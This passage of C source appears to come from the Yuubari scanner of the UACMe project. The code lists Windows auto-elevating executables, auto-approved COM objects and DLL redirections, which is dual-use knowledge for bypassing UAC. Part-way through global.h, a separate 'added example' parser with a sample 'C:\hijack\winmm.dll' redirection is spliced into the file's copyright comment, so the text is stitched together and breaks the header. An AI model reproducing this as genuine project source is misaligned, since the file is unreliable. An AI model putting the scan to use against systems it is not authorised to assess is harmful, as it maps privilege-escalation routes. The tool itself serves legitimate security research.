AutoElevateExempted; } // // Query settings failed, check if it known error like sxs key not exist. // if (status != STATUS_SXS_KEY_NOT_FOUND) { RtlSecureZeroMemory(szValue, sizeof(szValue)); _strcpy(szValue, TEXT("QueryActivationContext error =")); ultostr(status, _strend(szValue)); _strcat(szValue, TEXT("\r\n")); OutputDebugString(szValue); // // Don't output anything, just break, it is unexpected situation. // break; } } // // Even if autoElevate key could be not found, application still can be in whitelist. // As in case of inetmgr.exe on RS1+, so check if it has redirection dlls. 
// OutputCallback((PVOID)&FusionCommonData); // // Print redirection dlls from activation context // FusionProbeForRedirectedDlls(FileName, (PACTIVATION_CONTEXT)hActCtx, OutputCallback); } while (FALSE); if (hActCtx != INVALID_HANDLE_VALUE) ReleaseActCtx(hActCtx); if (usFileName.Buffer != NULL) RtlFreeUnicodeString(&usFileName); if (DllBase != NULL) NtUnmapViewOfSection(NtCurrentProcess(), DllBase); if (hSection != NULL) NtClose(hSection); if (hFile != NULL) NtClose(hFile); if (FileName != NULL) VirtualFree(FileName, 0, MEM_RELEASE); } /* * FusionScanFiles * * Purpose: * * Scan directory for files of given type. * */ VOID FusionScanFiles( _In_ LPWSTR lpDirectory, _In_ OUTPUTCALLBACK OutputCallback ) { HANDLE hFile; LPWSTR lpLookupDirectory = NULL; SIZE_T sz; WIN32_FIND_DATA fdata; sz = (_strlen(lpDirectory) + MAX_PATH) * sizeof(WCHAR); lpLookupDirectory = (LPWSTR)supHeapAlloc(sz); if (lpLookupDirectory) { _strncpy(lpLookupDirectory, MAX_PATH, lpDirectory, MAX_PATH); _strcat(lpLookupDirectory, TEXT("\\*.exe")); hFile = FindFirstFile(lpLookupDirectory, &fdata); if (hFile != INVALID_HANDLE_VALUE) { do { FusionCheckFile(lpDirectory, &fdata, OutputCallback); } while (FindNextFile(hFile, &fdata)); FindClose(hFile); } supHeapFree(lpLookupDirectory); } } /* * FusionScanDirectory * * Purpose: * * Recursively scan directories. 
* */ VOID FusionScanDirectory( _In_ LPWSTR lpDirectory, _In_ OUTPUTCALLBACK OutputCallback ) { SIZE_T cchBuffer; HANDLE hDirectory; LPWSTR lpFilePath; WIN32_FIND_DATA fdata; FusionScanFiles(lpDirectory, OutputCallback); cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory); lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR)); if (lpFilePath) { _strcpy(lpFilePath, lpDirectory); supConcatenatePaths(lpFilePath, L"*", cchBuffer); hDirectory = FindFirstFile(lpFilePath, &fdata); if (hDirectory != INVALID_HANDLE_VALUE) { do { if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && (fdata.cFileName[0] != L'.') ) { _strcpy(lpFilePath, lpDirectory); supConcatenatePaths(lpFilePath, fdata.cFileName, cchBuffer); FusionScanDirectory(lpFilePath, OutputCallback); } } while (FindNextFile(hDirectory, &fdata)); FindClose(hDirectory); } supHeapFree(lpFilePath); } } ================================================ FILE: Source/Yuubari/fusion.h ================================================ #/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2026 * * TITLE: FUSION.H * * VERSION: 1.61 * * DATE: 12 Feb 2026 * * Header file for the autoelevated applications scan. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #pragma once #define UacFusionDataCommonType 0 #define UacFusionDataRedirectedDllType 1 typedef enum { AutoElevateUnspecified = 0, AutoElevateDisabled = 1, AutoElevateEnabled = 2, AutoElevateExempted = 3 } AUTOELEVATESTATE; typedef struct _UAC_FUSION_DATA { DWORD DataType; LPWSTR Name; ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel; AUTOELEVATESTATE AutoElevateState; BOOL IsFusion; BOOL IsDotNet; BOOL IsOSBinary; BOOL IsSignatureValidOrTrusted; } UAC_FUSION_DATA, *PUAC_FUSION_DATA; typedef struct _UAC_FUSION_DATA_DLL { DWORD DataType; LPWSTR FileName; LPWSTR KeyName; LPWSTR DllName; } UAC_FUSION_DATA_DLL, *PUAC_FUSION_DATA_DLL; typedef struct _DLL_REDIRECTION_LIST_ENTRY { SLIST_ENTRY ListEntry; //For release RtlFreeUnicodeString used, Buffer of both allocated in Process Heap UNICODE_STRING KeyName; UNICODE_STRING DllName; } DLL_REDIRECTION_LIST_ENTRY, *PDLL_REDIRECTION_ENTRY; typedef struct _DLL_REDIRECTION_LIST { SLIST_HEADER Header; ULONG Depth; } DLL_REDIRECTION_LIST, *PDLL_REDIRECTION_LIST; NTSTATUS SxsGetDllRedirectionFromActivationContext( _In_ PACTIVATION_CONTEXT ActivationContext, _In_ PDLL_REDIRECTION_LIST DllList); VOID FusionScanDirectory( _In_ LPWSTR lpDirectory, _In_ OUTPUTCALLBACK OutputCallback); extern ptrWTGetSignatureInfo WTGetSignatureInfo; ================================================ FILE: Source/Yuubari/global.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: GLOBAL.H * * VERSION: 1.54 * * DATE: 02 Dec 2022 * * Common header file for the program support routines. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
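The walk that fusion.c performs over activation context data (SxsGetTocHeaderFromActivationContext, SxsGetDllRedirectionFromActivationContext, SxsGetStringSectionRedirectionDlls) is a parse of process-readable binary structures whose offsets, counts and lengths all come from the data itself, so each one has to be checked against the object that encloses it before the pointer is formed. The following is an added example and not part of the UACMe sources: a portable C walker over a constructed activation-context blob that applies that discipline end to end (TotalSize clamped to the buffer actually held, every offset+length checked without integer wrap, section-relative offsets resolved against the section as fusion.c does, and a hard stop on the first inconsistency instead of skipping to the next entry), then collects the same KeyName/DllName pairs that FusionProbeForRedirectedDlls reports as DllRedirection. The struct layouts and the two magic values are assumptions modelled on the public ntsxs definitions, the blob is constructed rather than captured from a real process, and the names actx_collect_redirections, build_sample_blob, sample_first_dll and parse_corrupted_sample are this example's own; it needs no Windows headers.

```c
/* Added example, not UACMe code. Struct layouts follow the public ntsxs definitions (assumed here). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define ACTX_DATA_MAGIC              0x78746341u  /* bytes "Actx" (assumed) */
#define ACTX_STRING_SECTION_MAGIC    0x64487353u  /* bytes "SsHd" (assumed) */
#define ACTX_SECTION_FORMAT_STRING   1u
#define ACTX_SECTION_DLL_REDIRECTION 2u

typedef struct { uint32_t Magic, HeaderSize, FormatVersion, TotalSize, DefaultTocOffset,
                 ExtendedTocOffset, AssemblyRosterOffset, Flags; } ActxData;                    /* 32 bytes */
typedef struct { uint32_t HeaderSize, EntryCount, FirstEntryOffset, Flags; } ActxTocHeader;      /* 16 bytes */
typedef struct { uint32_t Id, Offset, Length, Format; } ActxTocEntry;                            /* 16 bytes */
typedef struct { uint32_t Magic, HeaderSize, FormatVersion, DataFormatVersion, Flags, ElementCount,
                 ElementListOffset, HashAlgorithm, SearchStructureOffset, UserDataOffset, UserDataSize; } ActxStrSection; /* 44 */
typedef struct { uint32_t PseudoKey, KeyOffset, KeyLength, Offset, Length, AssemblyRosterIndex; } ActxStrEntry; /* 24 */
typedef struct { uint32_t Size, Flags, TotalPathLength, PathSegmentCount, PathSegmentOffset; } ActxDllRedir;    /* 20 */
typedef struct { uint32_t Length, Offset; } ActxPathSegment;  typedef struct { char key[32]; char dll[64]; } Redirection;

/* [off, off+len) must lie inside `total` bytes; written so that off+len cannot wrap. */
static int in_bounds(size_t total, uint32_t off, size_t len) { return off <= total && len <= total - off; }
/* Narrow a UTF-16LE string of `bytes` bytes to ASCII; non-ASCII code units become '?'. */
static void utf16_to_ascii(const uint8_t *src, uint32_t bytes, char *dst, size_t cap) {
    size_t i, n = bytes / 2;
    for (i = 0; i < n && i + 1 < cap; i++)
        dst[i] = (src[2 * i + 1] == 0 && src[2 * i] < 0x80) ? (char)src[2 * i] : '?';
    dst[i] = '\0';
}

/* TOC -> DLL_REDIRECTION string section -> path segments, checking every offset/length against the
 * enclosing object before it is read. Returns redirections collected, or -1 at the first structural
 * failure (fusion.c's STATUS_SXS_CORRUPTION class): stop, do not skip, later offsets are no safer. */
int actx_collect_redirections(const uint8_t *blob, size_t blob_len, Redirection *out, int max_out) {
    ActxData hdr; ActxTocHeader toc; uint32_t i; int found = 0;
    if (blob_len < sizeof hdr) return -1;
    memcpy(&hdr, blob, sizeof hdr);
    if (hdr.Magic != ACTX_DATA_MAGIC || hdr.HeaderSize != sizeof hdr) return -1;
    if (hdr.TotalSize < hdr.HeaderSize || hdr.TotalSize > blob_len) return -1;    /* TotalSize is untrusted */
    if (!in_bounds(hdr.TotalSize, hdr.DefaultTocOffset, sizeof toc)) return -1;
    memcpy(&toc, blob + hdr.DefaultTocOffset, sizeof toc);
    if (toc.HeaderSize != sizeof toc || (toc.EntryCount == 0) != (toc.FirstEntryOffset == 0)) return -1;
    if (!in_bounds(hdr.TotalSize, toc.FirstEntryOffset, (size_t)toc.EntryCount * sizeof(ActxTocEntry))) return -1;
    for (i = 0; i < toc.EntryCount; i++) {
        ActxTocEntry e; ActxStrSection sec; const uint8_t *s; uint32_t j;
        memcpy(&e, blob + toc.FirstEntryOffset + i * sizeof e, sizeof e);
        if (e.Format != ACTX_SECTION_FORMAT_STRING || e.Id != ACTX_SECTION_DLL_REDIRECTION) continue;
        if (!in_bounds(hdr.TotalSize, e.Offset, e.Length) || e.Length < sizeof sec) return -1;
        s = blob + e.Offset;   /* offsets inside the section are section-relative, as in fusion.c */
        memcpy(&sec, s, sizeof sec);
        if (sec.Magic != ACTX_STRING_SECTION_MAGIC || sec.HeaderSize != sizeof sec) return -1;
        if (!in_bounds(e.Length, sec.ElementListOffset, (size_t)sec.ElementCount * sizeof(ActxStrEntry))) return -1;
        for (j = 0; j < sec.ElementCount; j++) {
            ActxStrEntry se; ActxDllRedir dr; ActxPathSegment ps; uint32_t k;
            memcpy(&se, s + sec.ElementListOffset + j * sizeof se, sizeof se);
            if (!in_bounds(e.Length, se.KeyOffset, se.KeyLength) || !in_bounds(e.Length, se.Offset, sizeof dr)) return -1;
            memcpy(&dr, s + se.Offset, sizeof dr);
            if (!in_bounds(e.Length, dr.PathSegmentOffset, (size_t)dr.PathSegmentCount * sizeof ps)) return -1;
            for (k = 0; k < dr.PathSegmentCount && found < max_out; k++) {
                memcpy(&ps, s + dr.PathSegmentOffset + k * sizeof ps, sizeof ps);
                if (!in_bounds(e.Length, ps.Offset, ps.Length)) return -1;
                utf16_to_ascii(s + se.KeyOffset, se.KeyLength, out[found].key, sizeof out[found].key);
                utf16_to_ascii(s + ps.Offset, ps.Length, out[found].dll, sizeof out[found].dll);
                found++;
            }
        }
    }
    return found;
}

/* Constructed sample, not a real activation context: one DLL_REDIRECTION section at offset 64 mapping
 * "winmm.dll" to "C:\hijack\winmm.dll" (section-relative: entry 44, key 68, record 86, segment 106,
 * path 114, section length 152). Returns the blob size, 216. */
size_t build_sample_blob(uint8_t *buf, size_t cap) {
    enum { SEC = 64, SECLEN = 152 };
    ActxData h = { ACTX_DATA_MAGIC, 32, 1, SEC + SECLEN, 32, 0, 0, 0 };
    ActxTocHeader t = { 16, 1, 48, 0 };
    ActxTocEntry e = { ACTX_SECTION_DLL_REDIRECTION, SEC, SECLEN, ACTX_SECTION_FORMAT_STRING };
    ActxStrSection s = { ACTX_STRING_SECTION_MAGIC, 44, 1, 1, 0, 1, 44, 0, 0, 0, 0 };
    ActxStrEntry se = { 0, 68, 18, 86, 20, 0 }; ActxDllRedir dr = { 20, 0, 38, 1, 106 }; ActxPathSegment ps = { 38, 114 };
    const char *key = "winmm.dll", *path = "C:\\hijack\\winmm.dll"; size_t n;
    if (cap < (size_t)(SEC + SECLEN)) return 0;
    memset(buf, 0, SEC + SECLEN);
    memcpy(buf, &h, 32); memcpy(buf + 32, &t, 16); memcpy(buf + 48, &e, 16);
    memcpy(buf + SEC, &s, 44); memcpy(buf + SEC + 44, &se, 24);
    memcpy(buf + SEC + 86, &dr, 20); memcpy(buf + SEC + 106, &ps, 8);
    for (n = 0; key[n]; n++) buf[SEC + 68 + 2 * n] = (uint8_t)key[n];      /* UTF-16LE, high byte 0 */
    for (n = 0; path[n]; n++) buf[SEC + 114 + 2 * n] = (uint8_t)path[n];
    return SEC + SECLEN;
}

/* Parse the sample; returns the first redirection target or NULL if parsing fails. */
const char *sample_first_dll(void) {
    static Redirection r[4]; uint8_t buf[256]; size_t len = build_sample_blob(buf, sizeof buf);
    return actx_collect_redirections(buf, len, r, 4) == 1 ? r[0].dll : NULL;
}

/* Same blob with the path segment's Offset pushed past the section: must give -1, not an OOB read. */
int parse_corrupted_sample(void) {
    uint8_t buf[256]; Redirection r[4]; uint32_t bad = 0xFFFFFFF0u; size_t len = build_sample_blob(buf, sizeof buf);
    memcpy(buf + 64 + 106 + 4, &bad, sizeof bad);   /* ActxPathSegment.Offset of the only segment */
    return actx_collect_redirections(buf, len, r, 4);
}

int main(void) {
    const char *dll = sample_first_dll();   /* NULL would mean our own sample failed to parse */
    return printf("DllRedirection: winmm.dll -> %s\ncorrupted sample -> %d\n", dll ? dll : "(parse failed)", parse_corrupted_sample()) < 0;
}
```

Build with `cc -std=c99 -Wall actx_walk.c` and run; the intact sample prints the winmm.dll redirection and the corrupted one prints -1. The check `off <= total && len <= total - off` is the shape to keep: `off + len <= total` can wrap a 32-bit offset such as 0xFFFFFFF0 back into range, which is exactly the value the corrupted sample carries.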
* *******************************************************************************/ #pragma once #if !defined UNICODE #error ANSI build is not supported #endif #include "shared\libinc.h" //disable nonmeaningful warnings. #pragma warning(disable: 4005) // macro redefinition #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s #pragma warning(disable: 4091) // 'typedef ': ignored on left of '' when no variable is declared #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER #include #include #include #include "shared\ntos\ntos.h" #include "shared\ntos\ntsxs.h" #include "shared\ntos\ntbuilds.h" #include "shared\minirtl.h" #include "shared\_filename.h" #include "shared\cmdline.h" #include "consts.h" #include "logger.h" #include "wintrustex.h" #include "sup.h" #include "cui.h" typedef VOID(WINAPI *OUTPUTCALLBACK)(PVOID OutputData); #include "appinfo.h" #include "basic.h" #include "comobj.h" #include "fusion.h" #ifdef _DEBUG #include "tests\test_fusion.h" #endif extern ULONG g_NtBuildNumber; extern BOOL g_VerboseOutput; ================================================ FILE: Source/Yuubari/logger.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2025 * * TITLE: LOGGER.C * * VERSION: 1.60 * * DATE: 17 Jun 2025 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" /* * LoggerCreate * * Purpose: * * Create log file. 
* */ HANDLE LoggerCreate( _In_opt_ LPWSTR lpLogFileName ) { WCHAR ch; LPWSTR fname = lpLogFileName; HANDLE hFile; DWORD bytesIO, lastError; if (lpLogFileName == NULL) { fname = TEXT("log.log"); } hFile = CreateFile(fname, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { ch = (WCHAR)0xFEFF; if (!WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL)) { lastError = GetLastError(); CloseHandle(hFile); SetLastError(lastError); return INVALID_HANDLE_VALUE; } } return hFile; } /* * LoggerWrite * * Purpose: * * Output text to file. * */ VOID LoggerWrite( _In_ HANDLE hLogFile, _In_ LPWSTR lpText, _In_ BOOL UseReturn ) { SIZE_T textLength = 0, bufferSize = 0; DWORD bytesIO = 0; LPWSTR Buffer = NULL; if (lpText == NULL) return; textLength = _strlen(lpText); if (textLength == 0) return; if (hLogFile != INVALID_HANDLE_VALUE) { if (UseReturn) { if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 3) return; bufferSize = (textLength + 3) * sizeof(WCHAR); } else { if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 1) return; bufferSize = (textLength + 1) * sizeof(WCHAR); } Buffer = (LPWSTR)supHeapAlloc(bufferSize); if (Buffer) { _strcpy(Buffer, lpText); if (UseReturn) _strcat(Buffer, TEXT("\r\n")); textLength = _strlen(Buffer); WriteFile(hLogFile, Buffer, (DWORD)(textLength * sizeof(WCHAR)), &bytesIO, NULL); supHeapFree(Buffer); } } } ================================================ FILE: Source/Yuubari/logger.h ================================================ #/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2017 * * TITLE: LOGGER.H * * VERSION: 1.0F * * DATE: 13 Feb 2017 * * Header file for the log file writter. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #pragma once HANDLE LoggerCreate( _In_opt_ LPWSTR lpLogFileName ); VOID LoggerWrite( _In_ HANDLE hLogFile, _In_ LPWSTR lpText, _In_ BOOL UseReturn ); ================================================ FILE: Source/Yuubari/main.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2026 * * TITLE: MAIN.C * * VERSION: 1.61 * * DATE: 12 Feb 2026 * * Program entry point. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" #include "Shlobj.h" BOOL g_VerboseOutput = FALSE; ULONG g_NtBuildNumber = 0; HANDLE g_LogFile = INVALID_HANDLE_VALUE; VOID LoggerWriteHeader( _In_ LPWSTR lpHeaderData) { LoggerWrite(g_LogFile, T_SPLIT, FALSE); LoggerWrite(g_LogFile, lpHeaderData, FALSE); LoggerWrite(g_LogFile, T_SPLIT, TRUE); } /* * AppInfoDataOutputCallback * * Purpose: * * Output callback for AppInfo scan. 
* */ VOID AppInfoDataOutputCallback( _In_ UAC_AI_DATA* Data ) { LPWSTR lpLog = NULL, Text = NULL; SIZE_T sz = 0, textLen, nameLen, bufferChars; if (Data == NULL) return; sz = (_strlen(Data->Name) * sizeof(WCHAR)); if (sz == 0 || sz > MAXDWORD - MAX_PATH) return; sz += MAX_PATH; lpLog = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz); if (lpLog) { switch (Data->Type) { case AiSnapinFile: Text = TEXT("SnapinFile: "); break; case AiManagementConsole: Text = TEXT("ManagementConsole: "); break; case AiAutoApproveEXE: Text = TEXT("AutoApproveEXE: "); break; case AiIncludedPFDirs: Text = TEXT("IncludedPFDir: "); break; case AiIncludedSystemDirs: Text = TEXT("IncludedSystemDir: "); break; case AiExemptedAutoApproveExes: Text = TEXT("ExemptedAutoApproveExe: "); break; case AilpIncludedWindowsDirs: Text = TEXT("IncludedWindowsDirs: "); break; case AiExcludedWindowsDirs: Text = TEXT("ExcludedWindowsDir: "); break; default: Text = TEXT("Unknown "); break; } _strcpy(lpLog, Text); textLen = _strlen(Text); nameLen = _strlen(Data->Name); bufferChars = sz / sizeof(WCHAR); if (textLen + nameLen < bufferChars) { _strcat(lpLog, Data->Name); LoggerWrite(g_LogFile, lpLog, TRUE); cuiPrintText(lpLog, TRUE); } HeapFree(GetProcessHeap(), 0, lpLog); } } /* * BasicDataOutputCallback * * Purpose: * * Output callback for basic UAC settings scan. * */ VOID WINAPI BasicDataOutputCallback( _In_ UAC_BASIC_DATA* Data ) { LPWSTR lpLog = NULL; SIZE_T sz = 0; if (Data == NULL) return; sz = (_strlen(Data->Name) * sizeof(WCHAR)) + MAX_PATH; lpLog = (LPWSTR)supHeapAlloc(sz); if (lpLog) { _strcpy(lpLog, Data->Name); _strcat(lpLog, TEXT("=")); if (Data->IsValueBool) { if (Data->Value == 0) _strcat(lpLog, TEXT("Disabled")); else _strcat(lpLog, TEXT("Enabled")); } else { ultostr(Data->Value, _strend(lpLog)); } LoggerWrite(g_LogFile, lpLog, TRUE); cuiPrintText(lpLog, TRUE); supHeapFree(lpLog); } } /* * RegistryOutputCallback * * Purpose: * * Output callback for registry autoelevated objects scan. 
 *
 */
VOID WINAPI RegistryOutputCallback(
    _In_ UAC_REGISTRY_DATA* Data
)
{
    UAC_INTERFACE_DATA* InterfaceData;
    LPOLESTR OutputString = NULL;

    if (Data == NULL)
        return;

    if (Data->DataType == UacCOMDataVirtualFactory) {
        LoggerWrite(g_LogFile, TEXT("VirtualFactory"), TRUE);
    }

    if ((Data->DataType == UacCOMDataCommonType) ||
        (Data->DataType == UacCOMDataVirtualFactory))
    {
        //
        // Output current registry key to show that we are alive.
        //
        if (Data->Name)
            LoggerWrite(g_LogFile, Data->Name, TRUE);

        if (Data->Key)
            cuiPrintText(Data->Key, TRUE);

        if (Data->AppId)
            LoggerWrite(g_LogFile, Data->AppId, TRUE);

        if (Data->LocalizedString)
            LoggerWrite(g_LogFile, Data->LocalizedString, TRUE);

        LoggerWrite(g_LogFile, TEXT("\r\n"), TRUE);
    }

    if (Data->DataType == UacCOMDataInterfaceTypeVF) {
        LoggerWrite(g_LogFile, TEXT("VirtualFactory Item"), TRUE);
    }

    if ((Data->DataType == UacCOMDataInterfaceType) ||
        (Data->DataType == UacCOMDataInterfaceTypeVF))
    {
        InterfaceData = (UAC_INTERFACE_DATA*)(PVOID)Data;

        if (InterfaceData->Name) {
            LoggerWrite(g_LogFile, InterfaceData->Name, TRUE);
            cuiPrintText(InterfaceData->Name, TRUE);
        }

        if (StringFromCLSID(&InterfaceData->Clsid, &OutputString) == S_OK) {
            LoggerWrite(g_LogFile, TEXT("CLSID"), TRUE);
            LoggerWrite(g_LogFile, OutputString, TRUE);
            cuiPrintText(OutputString, TRUE);
            CoTaskMemFree(OutputString);
        }

        if (StringFromIID(&InterfaceData->IID, &OutputString) == S_OK) {
            LoggerWrite(g_LogFile, TEXT("IID"), TRUE);
            LoggerWrite(g_LogFile, OutputString, TRUE);
            cuiPrintText(OutputString, TRUE);
            CoTaskMemFree(OutputString);
        }

        LoggerWrite(g_LogFile, TEXT("\r\n"), TRUE);
        cuiPrintText(TEXT("\r\n"), TRUE);
    }
}

/*
 * FusionOutputCallback
 *
 * Purpose:
 *
 * Output callback for autoelevated applications scan.
 *
 */
VOID WINAPI FusionOutputCallback(
    _In_ UAC_FUSION_DATA* Data
)
{
    LPWSTR lpText;
    LPWSTR lpLog = NULL;
    SIZE_T sz = 0, keyNameLen, dllNameLen, prefixLen, bufferChars;
    UAC_FUSION_DATA_DLL* Dll;

    if (Data == NULL)
        return;

    if (Data->DataType == UacFusionDataCommonType) {

        //
        // Display only binaries with autoelevation flags if not in verbose output
        //
        if ((Data->AutoElevateState == AutoElevateUnspecified) &&
            (g_VerboseOutput == FALSE))
        {
            return;
        }

        //
        // Output current filename
        //
        LoggerWrite(g_LogFile, TEXT("\r\n"), FALSE);
        LoggerWrite(g_LogFile, Data->Name, TRUE);
        cuiPrintText(Data->Name, TRUE);

        //
        // If application has autoElevate attribute, report full info
        //
        if (Data->IsFusion) {

            switch (Data->RunLevel.RunLevel) {
            case ACTCTX_RUN_LEVEL_AS_INVOKER:
                lpText = TEXT("asInvoker");
                break;
            case ACTCTX_RUN_LEVEL_HIGHEST_AVAILABLE:
                lpText = TEXT("highestAvailable");
                break;
            case ACTCTX_RUN_LEVEL_REQUIRE_ADMIN:
                lpText = TEXT("requireAdministrator");
                break;
            case ACTCTX_RUN_LEVEL_UNSPECIFIED:
            default:
                lpText = TEXT("unspecified");
                break;
            }

            //RequestedExecutionLevel
            LoggerWrite(g_LogFile, lpText, TRUE);

            if (Data->RunLevel.UiAccess > 0) {
                lpText = TEXT("uiAccess=TRUE");
            }
            else {
                lpText = TEXT("uiAccess=FALSE");
            }

            //UIAccess state
            LoggerWrite(g_LogFile, lpText, TRUE);

            //autoElevate state
            if (Data->AutoElevateState != AutoElevateUnspecified) {

                switch (Data->AutoElevateState) {
                case AutoElevateEnabled:
                    lpText = TEXT("autoElevate=TRUE");
                    break;
                case AutoElevateDisabled:
                    lpText = TEXT("autoElevate=FALSE");
                    break;
                case AutoElevateExempted:
                    lpText = TEXT("autoElevate=Exempted");
                    break;
                default:
                    break;
                }

                LoggerWrite(g_LogFile, lpText, TRUE);
            }
        }
        else {
            // no embedded manifest
            lpText = TEXT("Binary without embedded manifest");
            LoggerWrite(g_LogFile, lpText, TRUE);

            if (Data->IsOSBinary) {
                if (Data->IsSignatureValidOrTrusted == FALSE) {
                    lpText = TEXT("Warning: signature not valid or trusted");
                    LoggerWrite(g_LogFile, lpText, TRUE);
                }
                else {
                    lpText = TEXT("OS binary with valid digital signature");
                    LoggerWrite(g_LogFile, lpText, TRUE);
                }
            }
        }

        if (Data->IsDotNet) {
            lpText = TEXT("DotNet");
            LoggerWrite(g_LogFile, lpText, TRUE);
        }
    }

    if (Data->DataType == UacFusionDataRedirectedDllType) {

        Dll = (UAC_FUSION_DATA_DLL*)Data;

        if (Dll->DllName == NULL || Dll->KeyName == NULL)
            return;

        keyNameLen = _strlen(Dll->KeyName);
        dllNameLen = _strlen(Dll->DllName);

        if (keyNameLen == 0 || dllNameLen == 0 ||
            keyNameLen > MAXDWORD - dllNameLen - MAX_PATH)
        {
            return;
        }

        //
        // sz is a count of WCHARs; supHeapAlloc takes a byte count, so the
        // allocation must be scaled by sizeof(WCHAR), otherwise the buffer
        // holds only half the characters the length check below assumes.
        //
        sz = keyNameLen + dllNameLen + MAX_PATH;
        lpLog = (LPWSTR)supHeapAlloc(sz * sizeof(WCHAR));
        if (lpLog) {

            bufferChars = sz;

            _strcpy(lpLog, TEXT("DllRedirection: "));
            prefixLen = _strlen(TEXT("DllRedirection: "));

            if (prefixLen + keyNameLen + 4 + dllNameLen < bufferChars) {
                _strcat(lpLog, Dll->KeyName); // original DLL name from KeyName
                _strcat(lpLog, TEXT(" -> "));
                _strcat(lpLog, Dll->DllName); // redirected DLL path
                LoggerWrite(g_LogFile, lpLog, TRUE);
            }

            supHeapFree(lpLog);
        }
    }
}

/*
 * ListBasicSettings
 *
 * Purpose:
 *
 * Scan basic UAC settings.
 *
 */
VOID ListBasicSettings(
    VOID
)
{
    cuiPrintText(T_BASIC_HEAD, TRUE);
    LoggerWriteHeader(T_BASIC_HEAD);
    ScanBasicUacData((OUTPUTCALLBACK)BasicDataOutputCallback);
}

/*
 * ListCOMFromRegistry
 *
 * Purpose:
 *
 * Scan HKEY_CLASSES_ROOT for autoelevated COM objects.
 *
 */
VOID ListCOMFromRegistry(
    VOID
)
{
    INTERFACE_INFO_LIST InterfaceList;
    HRESULT hr;

    hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
    if (FAILED(hr))
        return;

    RtlSecureZeroMemory(&InterfaceList, sizeof(InterfaceList));

    __try {

        if (!CoEnumInterfaces(&InterfaceList))
            __leave;

        cuiPrintText(T_COM_HEAD, TRUE);
        LoggerWriteHeader(T_COM_HEAD);
        CoListInformation((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);

        //
        // AutoApproval COM list added since RS1.
        //
        if (g_NtBuildNumber >= NT_WIN10_REDSTONE1) {
            cuiPrintText(T_COM_APPROVE_HEAD, TRUE);
            LoggerWriteHeader(T_COM_APPROVE_HEAD);
            CoScanAutoApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);
        }

        cuiPrintText(T_BROKER_APPROVE_HEAD, TRUE);
        LoggerWriteHeader(T_BROKER_APPROVE_HEAD);
        CoScanBrokerApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);
    }
    __finally {
        if (InterfaceList.List)
            supHeapFree(InterfaceList.List);

        if (hr == S_OK)
            CoUninitialize();
    }
}

/*
 * ListFusion
 *
 * Purpose:
 *
 * Scan Windows directory for autoelevated apps.
 *
 */
VOID ListFusion(
    VOID
)
{
    HMODULE hModule;
    WCHAR szPath[MAX_PATH * 2];

    RtlSecureZeroMemory(szPath, sizeof(szPath));
    _strcpy(szPath, USER_SHARED_DATA->NtSystemRoot);
    _strcat(szPath, TEXT("\\system32\\wintrust.dll"));

    hModule = LoadLibraryEx(szPath, NULL, 0);
    if (hModule != NULL) {
        WTGetSignatureInfo = (ptrWTGetSignatureInfo)GetProcAddress(hModule, "WTGetSignatureInfo");
    }

    //scan Windows first
    cuiPrintText(T_WINFILES_HEAD, TRUE);
    LoggerWriteHeader(T_WINFILES_HEAD);

/*
#ifdef _DEBUG
    FusionScanDirectory(L"C:\\Windows\\system32", (OUTPUTCALLBACK)FusionOutputCallback);
    return;
#else*/
    FusionScanDirectory(USER_SHARED_DATA->NtSystemRoot, (OUTPUTCALLBACK)FusionOutputCallback);

    //scan program files next
    cuiPrintText(T_PFDIRFILES_HEAD, TRUE);
